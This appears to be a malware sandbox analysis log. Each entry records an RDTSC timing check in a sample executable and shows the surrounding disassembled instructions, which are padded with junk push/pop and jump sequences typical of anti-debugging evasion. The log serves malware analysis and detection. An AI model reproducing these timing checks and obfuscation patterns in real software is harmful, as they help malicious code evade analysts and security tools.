Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2DAC6 second address: D2DB37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4760DF9853h 0x0000000f nop 0x00000010 jng 00007F4760DF9859h 0x00000016 push 00000000h 0x00000018 add ebx, 6D28C560h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F4760DF9848h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a movzx edi, dx 0x0000003d xchg eax, esi 0x0000003e push ecx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2CC9D second address: D2CCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2DC77 second address: D2DC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F4760DF984Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2DC84 second address: D2DD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jns 00007F4760DF153Ch 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jmp 00007F4760DF1549h 0x0000001a mov dword ptr [ebp+122D1EFFh], edi 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 jmp 00007F4760DF1544h 0x0000002c mov eax, dword ptr [ebp+122D04C9h] 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F4760DF1538h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov ebx, dword ptr [ebp+122D3BE3h] 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push edx 0x00000057 call 00007F4760DF1538h 0x0000005c pop edx 0x0000005d mov dword ptr [esp+04h], edx 0x00000061 add dword ptr [esp+04h], 00000019h 0x00000069 inc edx 0x0000006a push edx 0x0000006b ret 0x0000006c pop edx 0x0000006d ret 0x0000006e push eax 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 jne 00007F4760DF1536h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2FCE7 second address: D2FD09 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4760DF9848h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4760DF9853h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2FD09 second address: D2FD0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2FD0F second address: D2FD63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4760DF9848h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 or ebx, dword ptr [ebp+122D3BE3h] 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+12454F87h] 0x00000034 push 00000000h 0x00000036 mov di, B83Dh 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007F4760DF984Ch 0x00000043 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D2FD63 second address: D2FD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4760DF1536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3209C second address: D320A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4760DF9846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D320A6 second address: D320AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D320AA second address: D320CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4760DF9856h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D34229 second address: D3422D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3422D second address: D34231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D34231 second address: D34255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4760DF1543h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jg 00007F4760DF153Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D34255 second address: D3425D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3431A second address: D3431E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3431E second address: D34342 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4760DF9852h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F4760DF984Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D34342 second address: D34346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3B7D8 second address: D3B7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3B7DE second address: D3B7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3B7E7 second address: D3B7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3B0B7 second address: D3B0BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3B1FB second address: D3B21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F4760DF984Ah 0x0000000d jmp 00007F4760DF984Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3B36A second address: D3B370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3B370 second address: D3B38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4760DF9852h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D3B38A second address: D3B390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CDC01E second address: CDC026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CDA51E second address: CDA545 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F4760DF154Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CDA545 second address: CDA55C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4760DF984Dh 0x00000009 jp 00007F4760DF9846h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CDA55C second address: CDA560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D44703 second address: D44714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4760DF984Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D44851 second address: D4485B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4760DF1536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4485B second address: D4487D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F4760DF9852h 0x00000010 ja 00007F4760DF984Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4487D second address: D4489F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 push ecx 0x00000009 jne 00007F4760DF1538h 0x0000000f pop ecx 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4760DF153Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4489F second address: D448BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4760DF9850h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D448BD second address: D448C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D499FA second address: D499FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D499FE second address: D49A08 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4760DF1536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D49A08 second address: D49A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D49A12 second address: D49A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D49A16 second address: D49A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D49A20 second address: D49A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D49A24 second address: D49A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D49A28 second address: D49A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 jng 00007F4760DF1536h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D49A3E second address: D49A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D49A42 second address: D49A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF1547h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4760DF1542h 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F4760DF1536h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D49A79 second address: D49A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D49FF6 second address: D4A006 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4760DF153Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A161 second address: D4A167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A167 second address: D4A16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A16B second address: D4A16F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A427 second address: D4A435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A435 second address: D4A449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4760DF9850h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A449 second address: D4A465 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4760DF153Bh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jg 00007F4760DF1563h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A465 second address: D4A46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A46B second address: D4A485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF1541h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A485 second address: D4A489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A5B3 second address: D4A5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4760DF1541h 0x00000009 pop ebx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A5CC second address: D4A5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A5D2 second address: D4A5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jo 00007F4760DF1536h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4A73B second address: D4A745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F4760DF9846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4AA27 second address: D4AA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4AA2B second address: D4AA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jng 00007F4760DF9846h 0x0000000d jmp 00007F4760DF9853h 0x00000012 pop edi 0x00000013 popad 0x00000014 push edi 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jno 00007F4760DF9846h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4AB9A second address: D4AB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4AB9E second address: D4ABB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D515E0 second address: D515E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D515E5 second address: D51611 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 ja 00007F4760DF984Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 jmp 00007F4760DF9852h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE0F0A second address: CE0F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE0F0E second address: CE0F26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF9854h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D502A2 second address: D502A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: CE0F56 second address: CE0F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D505C3 second address: D505CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D50893 second address: D508A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4760DF984Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D508A5 second address: D508AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D508AB second address: D508B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D4FFF4 second address: D5001B instructions: 0x00000000 rdtsc 0x00000002 je 00007F4760DF1536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F4760DF1549h 0x00000010 jmp 00007F4760DF1543h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D5001B second address: D5001F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D5001F second address: D5005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jbe 00007F4760DF1536h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 jnp 00007F4760DF1538h 0x00000018 pushad 0x00000019 popad 0x0000001a jnp 00007F4760DF153Ah 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jnl 00007F4760DF1536h 0x0000002c jmp 00007F4760DF1543h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D5005E second address: D50062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D50CAA second address: D50CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D50E31 second address: D50E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007F4760DF9852h 0x00000011 pop edx 0x00000012 popad 0x00000013 ja 00007F4760DF9864h 0x00000019 push edi 0x0000001a jnc 00007F4760DF9846h 0x00000020 jnc 00007F4760DF9846h 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jne 00007F4760DF9846h 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D542BC second address: D542D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F4760DF1536h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f jnc 00007F4760DF153Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D542D3 second address: D542E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jmp 00007F4760DF984Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59EE2 second address: D59EF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF153Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59EF8 second address: D59F0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4760DF984Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59F0A second address: D59F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	RDTSC instruction interceptor: First address: D59F10 second address: D59F27 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4760DF9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jo 00007F4760DF9846h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
